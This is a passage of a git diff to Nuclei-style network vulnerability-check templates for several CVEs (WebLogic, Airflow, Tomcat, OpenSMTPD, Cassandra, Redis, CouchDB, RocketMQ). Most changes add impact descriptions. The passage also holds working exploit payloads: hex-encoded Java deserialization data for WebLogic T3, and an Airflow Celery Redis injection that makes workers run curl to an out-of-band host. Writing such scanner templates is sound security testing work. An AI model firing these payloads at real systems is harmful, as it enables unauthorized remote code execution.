12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory reference: - https://www.anquanke.com/post/id/152164 - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL - https://nvd.nist.gov/vuln/detail/CVE-2018-2893 - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html - remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-2893 - epss-score: 0.973460000 + epss-score: 0.97346 metadata: max-request: 2 tags: cve,cve2018,weblogic,network,deserialization,rce,oracle - tcp: - inputs: + - data: "t3 12.2.1 - - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" + AS:255 + + HL:19 + + MS:10000000 + + PU:t3://us-l-breens:7001 + + \n" read: 1024 + - data: "000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078" type: hex read: 1024 - - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" - type: hex - read: 1024 + - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" type: hex read: 1024 + - data: "0000042e056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000001251e200000000000000100000118aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e310000f1440000000046911fd80000000000000000000000000000007878fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff" + type: hex + read: 1024 host: - "{{Hostname}}" - "{{Host}}:7001" - matchers: - type: word part: raw diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml index 9144c138b2..03e994c544 100644 --- a/network/cves/2020/CVE-2020-11981.yaml +++ b/network/cves/2020/CVE-2020-11981.yaml @@ -6,31 +6,45 @@ info: severity: critical description: | An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. + remediation: Upgrade apache-airflow to version 1.10.11 or higher. reference: - https://github.com/apache/airflow/pull/9178 - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981 - remediation: Upgrade apache-airflow to version 1.10.11 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-11981 cwe-id: CWE-78 - epss-score: 0.936930000 + epss-score: 0.93693 metadata: + verified: true max-request: 2 shodan-query: product:"redis" - verified: true tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive - variables: - data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"" + data: "*3\r + + $5\r + + LPUSH\r + + $7\r + + default\r + + $936\r + + {\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"" encode1: '[[["curl", "http://' encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]' end: '"}' - tcp: - inputs: - - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}" + - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r + + ')}}" read: 1024 host: - "{{Hostname}}" diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index 045b9a321a..443c1ee2a9 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -5,6 +5,8 @@ info: author: milo2012 severity: critical description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. + impact: | + This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, or credentials. remediation: https://access.redhat.com/solutions/4851251 reference: - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml index 96bff3c7f6..cc49c223ce 100644 --- a/network/cves/2020/CVE-2020-7247.yaml +++ b/network/cves/2020/CVE-2020-7247.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the OpenSMTPD process, potentially leading to a complete compromise of the affected system. remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6 reference: - https://www.openwall.com/lists/oss-security/2020/01/28/3 diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml index 6bdae518ae..72c761c099 100644 --- a/network/cves/2021/CVE-2021-44521.yaml +++ b/network/cves/2021/CVE-2021-44521.yaml @@ -5,6 +5,8 @@ info: author: Y4er severity: critical description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.' + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the Cassandra process, potentially leading to a complete compromise of the affected system. remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2 reference: - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index 96b18d66b1..3cb5425da5 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -9,6 +9,8 @@ info: vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and compromise of the affected system. remediation: Update to the most recent versions currently available. reference: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 7d05c564ec..c2602df65a 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value. reference: diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index 8c4b279082..3886e63400 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -6,6 +6,8 @@ info: severity: high description: | muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the system. remediation: Update the application to version 1.10 reference: - https://derekabdine.com/blog/2022-arris-advisory.html diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index 51c2a56a98..ec7b896b13 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x . + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Update the RocketMQ application to version 5.1.1 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-33246